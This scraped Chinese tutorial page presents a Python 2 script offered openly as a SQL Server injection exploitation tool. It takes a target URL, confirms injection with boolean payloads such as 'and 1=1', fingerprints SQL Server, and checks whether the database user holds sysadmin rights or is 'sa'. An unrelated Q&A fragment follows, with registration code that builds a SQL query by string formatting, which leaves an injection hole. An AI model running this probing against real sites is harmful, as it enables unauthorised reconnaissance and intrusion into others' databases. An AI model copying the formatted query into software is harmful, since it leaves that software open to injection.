Python编写检测数据库SA用户的方法,python编写数据库sa
Python编写检测数据库SA用户的方法,python编写数据库sa
本文讲述一个用Python写的小程序,用于有注入点的链接,以检测当前数据库用户是否为sa,详细代码如下:
# Code by zhaoxiaobu Email: little.bu@hotmail.com #-*- coding: UTF-8 -*- from sys import exit from urllib import urlopen from string import join,strip from re import search def is_sqlable(): sql1="%20and%201=2" sql2="%20and%201=1" urlfile1=urlopen(url+sql1) urlfile2=urlopen(url+sql2) htmlcodes1=urlfile1.read() htmlcodes2=urlfile2.read() if not search(judge,htmlcodes1) and search(judge,htmlcodes2): print "[信息]恭喜!这个URL是有注入漏洞的!n" print "[信息]现在判断数据库是否是SQL Server,请耐心等候....." is_SQLServer() else: print "[错误]你确定这个URL能用?换个别的试试吧!n" def is_SQLServer(): sql = "%20and%20exists%20(select%20*%20from%20sysobjects)" urlfile=urlopen(url+sql) htmlcodes=urlfile.read() if not search(judge,htmlcodes): print "[错误]数据库好像不是SQL Server的!n" else: print "[信息]确认是SQL Server数据库!n" print "[信息]开始检测当前数据库用户权限,请耐心等待......" is_sysadmin() def is_sysadmin(): sql = "%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'))" urlfile = urlopen(url+sql) htmlcodes = urlfile.read() if not search(judge,htmlcodes): print "[错误]当前数据库用户不具有sysadmin权限!n" else: print "[信息]当前数据库用户具有sysadmin权限!n" print "[信息]检测当前用户是不是SA,请耐心等待......" is_sa() def is_sa(): sql = "%20and%20'sa'=(select%20System_user)"; urlfile = urlopen(url+sql) htmlcodes = urlfile.read() if not search(judge,htmlcodes): print "[错误]当前数据库用户不是SA!n" else: print "[信息]当前数据库用户是SA!n" print "n########################################################################n" print " ^o^SQL Server注入利用工具^o^ " print " Email: little.bu@hotmail.comn" print "========================================================================"; url = raw_input('[信息]请输入一个可能有注入漏洞的链接!nURL:') if url == '': print "[错误]提供的URL必须具有 '.asp?xxx=' 这样的格式" exit(1) judge = raw_input("[信息]请提供一个判断字符串.n判断字符串:") if judge == '': print "[错误]判断字符串不能为空!" exit(1) is_sqlable()
改成这样就行了
def reg():
account=raw_input('请输入账号 :')
if account.strip()=='':#默认去除首尾空格
print u'姓名不能为空'
return (reg)
else:
query="select account from User where account='%s'"%account
cur.execute(query)
existaccount=cur.fetchall()
print existaccount
if not existaccount:
while True:
password=raw_input('请用户 %s 输入密码:'% account)
password1=raw_input('请用户 %s 再次输入密码:'% account)
if password==password1:
user_name=raw_input('输入姓名:')
cur.execute('INSERT INTO User (user_name,account,password) VALUES(?,?,?)',(user_name,account,password))
con.commit()
print('恭喜用户%s,注册成功!!!')%account
cur.close()
con.close()
break
else :
print '密码输入不一致'
else:
print '用户名 %s 已存在'% account
这个是什么意思,你准备再创建一个用户?还是什么?
sa是装SQLSERVER时,就设置好的,你只需要填写密码,这个用户就存在了。
相关内容
- Python文件操作类操作实例详解,
- 使用nodejs、Python写的一个简易HTTP静态文件服务器,
- Python文件夹与文件的操作实现代码,
- 用python + openpyxl处理excel2007文档思路以及心得,
- 用python + hadoop streaming 分布式编程(一) -- 原理介绍,
- python re正则表达式模块(Regular Expression),pythonregular
- Python实现扫描指定目录下的子目录及文件的方法,
- Python重新引入被覆盖的自带function,python自带function
- Python实现动态添加类的属性或成员函数的解决方法,
- 记录Django开发心得,django开发心得
评论关闭